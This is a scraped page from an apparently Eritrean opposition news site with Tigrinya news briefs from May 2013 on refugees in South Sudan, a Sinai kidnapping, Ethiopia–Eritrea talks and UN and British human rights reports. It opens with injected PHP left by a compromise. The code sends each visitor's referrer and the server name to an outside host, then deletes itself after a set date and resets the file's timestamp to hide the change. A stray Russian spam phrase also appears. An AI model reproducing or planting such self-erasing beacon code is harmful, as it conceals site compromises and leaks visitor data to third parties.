check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ብኤርትራውያን ስደተኛታት ተባሒቱ ዘሎ ዕድል ስራሕ ደቡብ ሱዳን ባይቶ እታ ሃገር ክዝትየሉ ፕረዚደንት ሳልቫኪር ጸዊዑ።
кремлевская диета

ብኤርትራውያን ስደተኛታት ተባሒቱ ዘሎ ዕድል ስራሕ ደቡብ ሱዳን ባይቶ እታ ሃገር ክዝትየሉ ፕረዚደንት ሳልቫኪር ጸዊዑ።

User Rating: / 0
PoorBest 

 

 

 

 

 

 

02 ግንቦት 2013

ብኤርትራውያን ስደተኛታት ተባሒቱ ዘሎ ዕድል ስራሕ ደቡብ ሱዳን ባይቶ እታ ሃገር ክዝትየሉ ፕረዚደንት ሳልቫኪር ጸዊዑ።

መብዛሕትኦም ኤርትራውያን ዝርከብዎም ኣብ ደቡብ ሱዳን ዝረከቡ ስደተኛታት ብሒቶም ንዘለዉ ዕድላት ስራሕ እታ ሃገር ናብ ዜጋታት ደቡብ ሱዳን ንምስግጋር ባይቶ እታ ሃገር  ክዝትየሉ ፕረዚደንት ሳልቫኪር ጸዊዑ ከም ሓበሬታ ሬድዮ ኤረና።

እቲ ፍሉይ ሞያን ክእለትን ዘየድልዩ ዕድላት ስራሕ ንዜጋታት እታ ሃገር ክሕዛእ ኣለዎ ክብል ዝገለጸ ፕረዚደንት ሳልቫኪር ብፍላይ ምምራሕ መኪናን ብቦጣት ማይ ምዕዳልን ዝኣመሰሉ ንጥፈታት ዜጋታት ካልኦት ሃገራት ዝሰርሑሉ ምኽንያት ብዘይ ምህላው ሓደ ንድፊ ክወጽእ ኣዚዙሎ።

ኤርትራውያንን ካልኦት ስደተኛታትን ነዛ ሃገር ዕድል ስራሕ ከሊኦማለዉ ዝብል እምነት ከምዘለዋ ዝገለጸ ኣብ ባንኪ ዓለም ኣማኻሪ ብሕታዊ ጽላት ከም ከቲንስን ብወገኑ እዚ ከኣ ሓደ ጠንቒ ዘይምርግጋእ እታ ሃገር ኮይኑ ከምዝጥቀስ ኣነጺሩ።

ዝበዝሐ ሞያን ፍሉይ ክእለትን ዘድልዮ ስራሕውን እንተኾነ ብወጻእተኛታት ተባሒቱ ምህላዉ ኣግባብነት የብሉን ኢሉ መረረቱ ዝገለጸ ሓደ ክኢላ እታ ሃገር ብወገኑ ኩሉ ስራሕ ኣብ ኢድ ወጻእተኛታት ምውዳቑ ውሕስነት ከምዘይብልና ዘነጽር ክብል ገሊጹ።

ኣብ ጁባ ዓሰርተታት ኣሽሓት ኤርትራውያን ኣብ ዝተፈላለየ ሞያ ተዋፊሮም ከም ዝርከቡ ሬድዮ ኤረና ብተወሳኺ ሓቢራያ።

----------------------------------------////////-------------------------------------

02 ግንቦት 2013

ብበዳዊን ተታሒዛ ክትሳቐ ዝጸንሐት ጓል 17 ዓመት ኤርትራዊት ተለቒቓ

ከም ሓበሬታ ጋዜጣ ኤክስፕረስን ኣደዳ መጭወይቲ ሲናይ ኮይና ስቓይን መግረፍትን ክወርዳ ዝጸንሐት ጓል 17 ዓመት ኤርትራዊት ዜጋ ተፈንያላ።

እዛ ድሕሪ መጭወይቲ ኣብ ሽወደን ምስ እትርከብ ወላዲታ ተራኺባ ዘላ ኤርትራዊት ዜጋ 25 ሽሕ ዶላር ከፊላ ካብ ኢድቶም ገበነኛታት ከም ዝተገላገለት ተጠቒሱ’ሎ።

እዛ ንክትኣምኖ ዘጸግም ግፍዒ ዝወረዳ ዜጋ ከቢድ ናይ ኣእምሮ ጸገም ኣጋጢምዋ ኣብ ገዛ ተዓጽያ ክትውዕል  ተገዲዳ ከም ዘላ’ውን ጸብጻብ ጋዜጣ ኤክስፕረስን ወሲኹ ኣነጺሩ።

------------------------------------------///////------------------------------------

02 ግንቦት 2013

ግንባር ሃገራዊ ድሕነት ኤርትራ ዞባ ኤውሮጳ 5

ዞባዊ ጉባኤን ውድባዊ ሰሚናርን ከም ዘቃነዐ ተገሊጹ።

ኣብ መርበባት ሓበሬታ ቶጎርባን ድሕነት ዶት ኦርግን ዝተረኽበ ዜና ከም ዝሓበሮ ግንባር ሃገራዊ ድሕነት ኤርትራ ዞባ ኤውሮጳ ኣብ ከተማ ካስል ጀርመን 5 ዞባዊ ጉባኤን ውድባዊ ሰሚናርን ኣቃኒዑ’ሎ።

ኣብቲ መኽፈቲ ስነ-ስርዓት ሽማግለ ዞባ ኣብ ውሽጢ ሓደ ዓመት ንዘካየደቶም ፖለቲካዊ ስርርዓዊ ቁጠባዊን ምምሕዳራውን ንጥፈታት ዝድህስስ መብርሂ ኣቕሪባ’ያ።

ኣብዚ ድሕሪ ውድባዊ ጉባኤ ን2 ግዚኡ ዝተቓነዐ ሰሚናር ኩነታት ውድብን ኣተረጓጉማ ኣብ ጉባኤ ዝጸደቐ መደባቱን፡ ኩነታት ደምበ ተቓውሞን ህሉው ኩነታት ህዝብናን ብዕምቆት ተዘትዩ’ሎ እዩ።

መሪሕነት ውድብ ከስተብህለሎምን ክዓየሎምን ዘለዎም ነጥብታት ብዕምቆት ዝተመልከተ እቲ ሰሚናር ኣገደስቲ ለበዋታት ብምሕላፍ ብዓወት ከም ዝተዛዘመ እተን መርበባት ሓበሬታ ገሊጸን ኣለዋ።

------------------------------------////////////-------------------------------------

 

 

 

02 ግንቦት 2013

ኢትዮጵያ ምስ ኤርትራ ንምዝርራብ ዘለዋ ቅሩብነት ደጊማ ኣረጋጊጻ

ሚኒስተር ሚኒስትሪ ጉዳያት ወጻኢ ኢትዮጵያ ዶ/ር ቴድሮስ ኣድሓኖም ኣብ ኒውዮርክ ምስ ዋና ጸሓፊ ሕቡራት ሃገራት ባንኪሙን ኣብ ዝገበሮ ርክብ ኢትዮጵያ ምስ ኤርትራ ዘሎ ዶባዊ ምስሕሓብ ብሰላማዊ መገዲ ንምፍታሕ ቅርብቲ ምዃና ደጊሙ ምርግጋጹ ሱዳን ትሪቡን ጸብጺቡ።

መንግስቲ ኤርትራ ብተደጋጋሚ ካብ መኣዲ ሰላም ክሃድም ይመርጽ ኣሎ ክብል ድማ ወቒሱ

ንሕና ኣብ ዝኾነ ይኹን እዋንን ቦታን ምስ መንግስቲ ኤርትራ ብዘይ ዝኾነ ይኹን ቅድመ ኩነት ክንዘራረብ ቅሩባት ኢና ድማ ኢሉ’ሎ።

ኣብ ኤርትራ ብዘሎ ነቃጽ መንግስቲ ኤርትራውያን ሓሳረ መከርኦም ይርእዩ ምህላዎም ድማ ኣብሪሁ።

ቅድም ክብል’ውን ቀዳማይ ሚኒስተር ኢትዮጵያ ዋላ ናብ ኣስመራ ከይዱ ምስ ፕረዚደንት ኢሳይያስ ገጽ ንገጽ ተራኺቡ ክዘራረብ ፍቓደኛ ከምዝኾነ ገሊጹ ኔሩ’ዩ።

ብወገን ስርዓት ኢሳይያስ ግን ዛጊት ንጻውዒት ሰላም ኢትዮጵያ ዝተዋሃበ ዋላሓንቲ መልሲ የለን።

ስርዓት ኢሳይያስ ሰራዊት ኢትዮጵያ ካብ ባድመ ከይወጸ ዘተ ሰላም ዝብሃል የለን ክብል መርገጺኡ ዝገልጸሉ ኩነታት ግን ሕጂ’ውን ኣብ ቦትኡ ከምዘሎ’ዩ ዝግለጽ።

ይኹን’ምበር እዚ ኣይ ኵናት ኣይ ሰላም ኮይኑ ዝቕጽል ዘሎ ህሞት ንኤርትራ ብኩለንተናዊ መዐቀኒታት ኣብ ዝብኣሰ ጸገም ክትሽመም ጌሩዋ ከምዘሎ ተንተንቲ ፖለቲካ ይሕብሩ።

----------------------------------------/////////------------------------------------

 

 

 

 

 

01 ግንቦት  2013

ክኢላ ሰብኣዊ መሰል ሕቡራት ሃገራት ንኩነታት ሰብኣዊ መሰል ኤርትራ ንምግምጋም ኤርትራውያን ስደተኛታት ዝህብዋ ሓበሬታ ክትጥቀም’ያ

ንኩነታት ሰብኣዊ መሰል ኤርትራ ክትግምግም ብሕቡራት ሃገራት ዝተመዘዘት ሼይላ ኪታሩት ካብ ኤርትራውያን ስደተኛታት ሓበሬታ ንምርካብ ኣብ ኢትዮጵያን ጅቡትን ወግዓዊ ምብጻሕ ክትገብር ከምዝኾነት ካብ ካርቱም ዝተቃልሐ ዜና ኣነጺሩ።

ኣብ ኢትዮጵያን ጅቡትን ተዓቊቦም ዘለዉ ኤርትራውያን ስደተኛታት ዝህቡዎ ሓበሬታ ድማ እታ ክኢላ ንኩነታት ሰብኣዊ መሰል ኤርትራ ዝምልከት ቀዳማይ ጽጹይ ሓበሬታኣ ክትገብሮ’ያ።

እታ ክኢላ ምንጪ  ተልእኾኣ ስደተኛታት ክኾኑ ዝገበረት ናብ ኤርትራ ከይትኣቱ ብስርዓት ኢሳይያስ ስለዝተከልከለት’ያ።

እታ ክኢላ ኣብ ዝሐለፈ ወርሒ ሕዳር ዓመተ 2012 ነቲ ተልእኾ ድሕሪ ምምዛዛ ንፈለማ እዋን’ያ ዕማማ ክትፍጽም ትወፍር ዘላ።

ንሳ ብስርዓት ኢሳይያስ ናብ ኤርትራ ከይትኣትው ምስተኸልከለት ኩነታት ሰብኣዊ መሰል ኤርትራ ዝምልከት ጥሉል ሓበሬታ ንምርካብ ግዳያት’ቲ ግህሰት ንዝኾኑ ስደተኛታትን ካልኦት በቲ ጉዳይ ዝግደሱ ኣካላትን ከምትጥቀም ገሊጻ’ያ።

ኢትዮጵያን ጅቡትን ድማ 10 መዓልታት ንዝውድእ ተልእኾ እታ ክኢላ ሰብኣዊ መሰል ሕቡራት ሃገራት ዘድሊ ምትሕብባር ክገብራ ምዃነን ኣረጋጊጸን ኣለዋ።

ንምኽባር ሰብኣዊ መሰል ዝሕለቃ ትካላት ኤርትራ ኣፍሪቃዊት ሰሜን ኮርያ ኮይናላ   ክብላ ብተደጋጋሚ ነቲ ዘሎ ሕሰም ዜጋታት ክገልጽኦ ምጽንሓን እቲ ዜና የነጽራ።

---------------------------------//////////////--------------------------------------

 

 

 

01 ግንቦት 2013

ስርዓት ህግደፍ ሕጂ’ውን ኣብ ኩነታት ሰብኣዊ መሰላት ዋላሓንቲ ምምሕያሽ ኣየርኣየን ክትብል ዓባይ ብሪጣንያ ገሊጻ

ብስርዓት ህግደፍ እትመሓደር ኤርትራ ነቲ ኣብዚ እዋን’ዚ ጎሊሑ ዝርአ ዘሎ ምግሃስ መሰል ሃይማኖት ናጽነት ፕረስ ሓሳብካ ብናጻ ናይ ምግላጽ መድረኽ ጉዳይ ሕጋዊ ኣብያተ ፍርድን ባይቶን ክትንክዮ ከምዘይካኣለት እቲ ብዓባይ ብሪጣንያ ዝወጸ ሪፖርት ኣስሚሩሉ’ሎ።

ጸብጻብ ክፍሊ ጉዳያት ወጻኢን ሓበራዊ ሃብትን ብሪጣንያ  ውድብ ሕቡራት ሃገራት ንኩነታት ሰብኣዊ መሰላት ኤርትራ ንምጽራይ ዝወሰዶ ተበግሶ ደገፉ ዝገለጸ ኮይኑ ስርዓት ህግደፍ ብውድብ ሕቡራት ሃገራት ንዝተመዘዘት ዲፕሎማሰኛ ኪታሩት ክቅበላ ፍቓደኛ ብዘይ ምዃኑ’ውን ወቒሱ።

ስርዓት ህግደፍ ኣብ ዓመተ 2009 ብሕብረት ኤውሮጳ ዝቐረበሉ ሓፈሻዊ ናይ ገምጋም እዋናት ተቐቢሉ ክነሱ ክሳብ ሕጂ ኣየተግበሮን ክብል እቲ ቤት ጽሕፈት ብተወሳኺ ሓቢሩ።

ብሪጣንያ ሕቶ ሰብኣዊ መሰላት ኤርትራ ብተደጋጋሚ ከተልዕሎ ምዃና’ውን ደጊማ ኣረጋጊጻ’ላ።

-------------------------------------/////////---------------------------------------

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player